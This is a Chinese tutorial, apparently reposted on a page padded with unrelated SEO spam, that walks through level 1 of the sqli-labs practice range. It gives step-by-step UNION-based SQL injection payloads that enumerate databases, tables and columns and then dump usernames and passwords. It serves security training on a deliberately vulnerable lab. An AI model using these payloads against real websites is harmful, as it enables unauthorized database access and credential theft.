当前位置: 首页 > news >正文

石碣企业网站建设公司wordpress移动端导航菜单

石碣企业网站建设公司,wordpress移动端导航菜单,网站排名应该怎么做,电子商务网站建设开题报告目录 一、判断是否存在注入点 二、构造类似?id1 --的语句 三、判断数据表中的列数 四、使用union联合查询 五、使用group_concat()函数 六、爆出数据库中的表名 七、爆出users表中的列名 八、爆出users表中的数据 🌈嗨!我是Filotimo__🌈。很…

 

目录

一、判断是否存在注入点

二、构造类似?id=1' --+的语句

三、判断数据表中的列数

四、使用union联合查询

五、使用group_concat()函数

六、爆出数据库中的表名

七、爆出users表中的列名

八、爆出users表中的数据


🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。

🎁欢迎大家给我点赞👍、收藏⭐️,并在留言区📝与我互动,这些都是我前进的动力!

🌟我的格言:森林草木都有自己认为对的角度🌟。

打开 sqli靶场第一关,以下是通关思路:

一、判断是否存在注入点

首先进行初步的试探,构造?id=1 and 1=1,页面正常

构造?id=1 and 1=2,页面正常

继续构造?id=1' and '1'='1,页面正常

构造?id=1' and '1'='2 ,页面无回显,判断为字符型注入。

二、构造类似?id=1' --+的语句

构造类似?id=1' --+的语句,我们可以在 ?id=1' 和 --+ 中间插入select语句,进行我们想要的操作。

在这个注入尝试中,' 是一个闭合单引号,用于关闭原始的查询语句中的引号,并添加注释符 -- 来注释掉后续的语句。+ 是空格的URL编码表示,用于在URL中表示空格。

三、判断数据表中的列数

这一步是为了使用union联合查询。

构造?id=1' order by 5 --+,出现如图回显,说明5超出了数据表中列的范围

构造?id=1' order by 4 --+,仍然超出

构造?id=1' order by 3 --+,正常回显,说明当前表只有3列

四、使用union联合查询

联合查询是 sql中用于将两个或多个查询的结果集组合成一个结果集的操作。使用union联合查询的前提是被联合的查询必须拥有相同数量的列,列的数据类型必须兼容。

构造如下语句:

?id=1' union select 1,2,schema_name from information_schema.schemata--+

后来发现只回显了数据库的第一行

继续构造

?id=' union select 1,2,schema_name from information_schema.schemata--+

这里去掉了id=1'中的1,使其为空。结果是我们终于回显出了数据库名

五、使用group_concat()函数

group_concat()函数是 MySQL 中的聚合函数,用于将多行数据按照指定的分隔符连接为一个字符串。

这里我们可以使用group_concat()函数,一次性的把库名显示出来:

?id=' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

六、爆出数据库中的表名

我们可以爆出数据库中的表名了,这里以information_schema为例

构造如下语句:

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

七、爆出users表中的列名

构造如下语句获得users表中的列名:

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

八、爆出users表中的数据

我们还能继续获得信息

(1)查看users表中所有的用户:

?id=' union select 1,2,group_concat(username) from security.users --+

(2)查看users表中所有的用户密码:

?id=' union select 1,2,group_concat(password) from security.users --+

(3)concat_ws(':',A,B)函数拼接信息:

这里可以用concat_ws(':',A,B)函数,拼接用户名和密码,使其成对出现

?id=' union select 1,2,group_concat(concat_ws(':',username,password)) from security.users --+

sqli靶场第一关通关思路到此结束

http://www.yayakq.cn/news/488488/

相关文章:

  • 网站的版式设计有哪些个人主页设计代码
  • 江门网站推广技巧方法广州网站建设专家
  • 陕西省建设厅网站首页属于网站建设过程规划和准备阶段的是
  • 烟台消防建设信息网站宁晋县建设局网站
  • 福州长乐网站建设设计一个电商网站的首页
  • 西部数码网站管理助手 2008教做粘土的网站
  • 专业网站建设的价格做网站的 深圳
  • 济南做网站的价格安徽安能建设集团网站
  • 自助建站系统是怎么实现深圳网站设计知名乐云seo
  • 网站建设的公司有哪些方面济南注册公司怎么注册
  • 房产中介 网站模板太原的网站建设公司哪家好
  • 做游戏网站用什么软件网站建设的需求和目的
  • 什么网站可以做字体效果好做印量调查的网站
  • 校园门户网站系统建设关键技术网络营销推广方法范文
  • 网站制作 信科网络苏州seo公司排名
  • 中国月球空间站wordpress内容页标题
  • 婚庆网站建设论文网页设计与制作实践
  • 合肥金融直播室网站建设如何把一个关键词优化到首页
  • 用织梦建设网站永久一级传奇网站
  • 广州 网站建设 行价网站建设信息
  • 江苏省教育现代化建设水平监测网站淘宝店铺 发布网站建设
  • 安阳做网站多少钱哪些平台可以建立网站吗
  • 注册做网站的营业执照ps做游戏网站
  • 中介网站模板青岛建手机网站哪家好
  • 如何做自己公司的网站广州seo搜索
  • 网站表单制作中企动力做的网站后台如何登陆
  • 快速排名网站系统无锡有哪些做网站的公司
  • 张店做网站沈阳seo代理计费
  • 深圳网站建设定制开发公司网站建设招标文件范本
  • 一起做网店网站哪里进货的加工中心编程培训学校